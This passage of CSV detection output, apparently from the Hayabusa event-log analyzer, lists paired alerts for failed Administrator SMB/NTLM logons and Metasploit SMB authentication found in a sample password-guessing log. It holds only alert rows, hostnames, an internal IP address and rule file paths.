Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
